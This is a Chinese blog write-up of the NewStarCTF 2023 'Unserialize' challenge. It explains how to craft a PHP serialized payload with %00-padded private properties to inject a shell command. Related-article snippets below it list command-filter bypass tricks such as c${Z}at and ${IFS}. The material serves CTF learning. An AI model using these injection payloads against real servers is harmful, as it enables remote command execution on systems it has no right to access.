[NewStarCTF 2023 公开赛道]Unserialize

最新推荐文章于 2024-09-03 09:28:19 发布
最新推荐文章于 2024-09-03 09:28:19 发布
阅读量247 收藏 4
点赞数 9
文章标签: java 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20242529/article/details/138319892
版权
本文讨论了PHP中如何处理私有属性$cmd在反序列化过程中的问题,涉及到了不可见字符%00的处理、URL编码技巧以及利用sort命令查看flag文件的细节。
摘要由CSDN通过智能技术生成

一道反序列的基础题,但是细节蛮多的。

这里有一个细节。$cmd 是 private 属性的,赋值只能在内部赋值。即 private $cmd = <命令>

不能

然后if判断语句是过滤我们输入的命令,这里比较好绕过。常见的cat命令代替

编写exp

<?php
highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil {
    private $cmd="ls";
}


$res=new evil;
echo serialize($res);
?>

浏览器输出的结果:O:4:"evil":1:{s:9:"evilcmd";s:2:"ls";}

这里直接将输出结果传进去是不行的。原因

PHP 序列化的时候 private和 protected 变量会引入不可见字符%00,private是%00类名%00属性名 ,protected为%00*%00属性名 ,注意这两个 %00就是 ascii 码0的字符。这个字符显示和输出可能看不到,甚至导致截断(无法复制),但是url编码后就可以看得清楚.。

就是说上面的O:4:"evil":1:{s:9:"evilcmd";s:2:"ls";}

要改为O:4:"evil":1:{s:9:"%00evil%00cmd";s:2:"ls";}

接下来查看根目录,这里也有一个细节%20算作一个字符串,所以s:后面填4。

最后就是查看flag文件了,可以用上面提到的命令替换cat命令。这里就用sort命令来看。

zero__ddday
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
[NewStarCTF 公开赛]UnserializeOne
qq_20242529的博客
04-29 278
先将代码复制进vscode,然后把所有和属性无关的删除。将结果以POST请求传给参数POP。这里不知魔术方法的功能可以看这两个链接。这题的链路比较好复原,正向逆向都可以。正向复原,图画的比较丑,谅解一下。这题是反序列pop类型的。
php中unserialize返回false的解决方法
10-25
不过,在使用unserialize时可能会遇到返回false的情况,这通常意味着序列化的字符串中存在一些问题。针对这一问题,文章首先说明了php中unserialize函数返回false的解决方法。 首先,文章指出序列化是PHP程序设计中...
NewStarCTF2023week2-Unserialize
Welcome To Myon'Blog !
10-15 6518
创建了一个 evil 对象并设置了 cmd 属性,然后对对象进行了序列化。但要注意,在 PHP 中,如果一个类包含私有属性,并且你尝试序列化该对象,私有属性的值将不会被包括在序列化结果中。因此,在反序列化时,你无法访问 cmd 属性的值,因为它不会被正确反序列化。定义了一个eval类,该类下有一个私有变量cmd和公有成员函数destruct(),该函数在对象的所有引用都被删除或类被销毁时会自动调用;如果满足if条件,没有被匹配到,则会调用system函数,执行我们传入的cmd内容;在根目录下找到flag。
NewStar CTF UnserializeOne
qq_62260766的博客
10-03 1233
NewStarCTF php反序列化
Newstar week5 WEB Unserialize Again(phar反序列化,__wakeup()绕过,phar重签名)
2301_76690905的博客
11-10 319
newf = s + sha1(s).digest() + h # 对要签名的数据进行SHA-1哈希计算,并将原始数据、签名和类型/标识拼接成新的数据newf。//写文件,文件名是$pear,内容是$file。f = file.read() #打开名为1.phar的文件,以二进制只读模式读取文件内容,并将其存储到变量f中。在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以。因为重新赋值修改了文件的内容,之前的签名就会无效,所以需要。
NewStarCTF 公开赛-web
qq_61768489的博客
11-22 2386
cookie 修改admin 源码发现key GET和POST传参即可。
浅谈php函数serialize()与unserialize()的使用方法
10-25
unserialize()则用于将字符串形式的状态信息转换回原始的数组或对象。这种机制对于需要临时保存变量状态,然后重新加载它们的场景非常有用,例如,在会话管理或者数据持久化操作中。 序列化的数据通常包含了变量...
php函数serialize()与unserialize()用法实例
10-25
主要介绍了php函数serialize()与unserialize()用法,以实例形式详细讲述了php函数serialize()与unserialize()的适用情况与使用方法,具有很好的参考借鉴价值,需要的朋友可以参考下
php serialize()与unserialize() 不完全研究
10-19
在示例中,当我们调用 `unserialize($dogdisc)`,原来的 `dog` 对象就得以重建,所有属性如 `name`、`age` 和 `owner` 都被正确设置。即使我们注销了原来的 `$ourfirstdog`,通过 `unserialize()` 仍能恢复并继续...
详解php中serialize()和unserialize()函数
10-19
在PHP编程语言中,`serialize()` 和 `unserialize()` 是两个非常重要的内置函数,它们用于在内存中的PHP值与字符串之间进行转换。这对于数据持久化、传输或者在不同上下文中保持变量状态非常有用。 `serialize()` ...
# NewStarCTF 公开赛 WEEK4
as you know, nlp is fantasitc!
10-17 1169
payload注意用url编码将base64编码后的特殊字符编码。文件上传+phar反序列化。生成下payload就能打。简单的反序列化题,用。
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
2023NewStarCtf [WEEK2] web 方向超详细wp(题目+思路+拓展知识点)
2301_76690905的博客
10-15 1600
这里需要修改前端js文件,用变量覆盖修改gamescore的值,使得判定为大于100000分。步骤:火狐找到调试器下的js文件,在里面gamescore这一行打断点(点一下347那行的开头就行),然后点击开始游戏,游戏会在打中目标的时候停在断点处,这时候点击控制台,在里面写入gameScore=99999999999然后回车,就相当于给这里的gamescore赋值了99999999999,然后点击左上角这个运行,回到调试器把鼠标移到gamescore上面看看有没有赋值成功,然后点击运行,就能弹出flag。
NewStarCTF 2023---Web week2
WMY0323的博客
01-09 428
本题是一个反序列化题目,从题目中可以分析出,题目中定义了一个类evil,一个成员属性为private私有的cmd,过滤了cat、tac、more、tail、base并且大小写都进行了过滤。使用post方式进行传参,参数为unser。
NewStar CTF Week3Misc 4-5Web
weixin_63231007的博客
12-05 1142
目录 Week-3 Misc(1) Whats HTTP(2) qsdz's girlfriend 3(3) WebShell!(4) 混沌的图像 Week-4 Web(1) So Baby RCE(%0A进行rce rev|sort读取flag)(2) UnserializeThree(%0d换行rce) week5-web(1) Give me your photo PLZ(.htaccess配置文件漏洞)(2) Unsafe Apache(CVE-2021-42013)(3) So
[NewStarCTF 公开赛]
wxy_1234_的博客
04-15 1589
传入key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";能过滤掉基本都过滤了,其实正则匹配cat直接c${Z}at​可以执行cat,空格可以用${IFS}​绕过。抓包传入O:7:"ctfshow":2:{ctfshow}得到flag。post传入O:7:"ctfshow":2:{ctfshow}也没用。post传入O:7:"ctfshow":2:{}发现没用。
NewStarCTF 公开赛
m0_62129839的博客
10-29 909
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
浅析synchronized锁升级的原理与实现 1
水w的博客
09-01 1148
浅析synchronized锁升级的原理与实现
SpringBoot 项目集成 xxl-job
最新发布
qq_58159506的博客
09-03 348
SpringBoot 项目集成 xxl-job
unserialize
08-29
unserialize函数是PHP中的一个函数,它用于将一个字符串表示的序列化对象转换回原始的PHP对象。当使用serialize函数将一个对象序列化为字符串后,可以使用unserialize函数将其还原为原始的对象。 在使用unserialize函数时,如果被反序列化的字符串中包含有特殊的魔术方法(magic methods)如__construct、__destruct、__wakeup等,这些方法会在对象被创建、销毁或者反序列化时自动调用。 反序列化的过程是非常有用的,可以在用户之间传递对象,或者将对象持久化存储到文件或数据库中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [浅谈php函数serialize()与unserialize()的使用方法](https://download.csdn.net/download/weixin_38726255/13043889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [反序列化(Unserialize)漏洞详解](https://blog.csdn.net/qq_49422880/article/details/120488517)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [渗透测试基础 -unserialize反序列化漏洞](https://blog.csdn.net/weixin_45488495/article/details/116403291)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值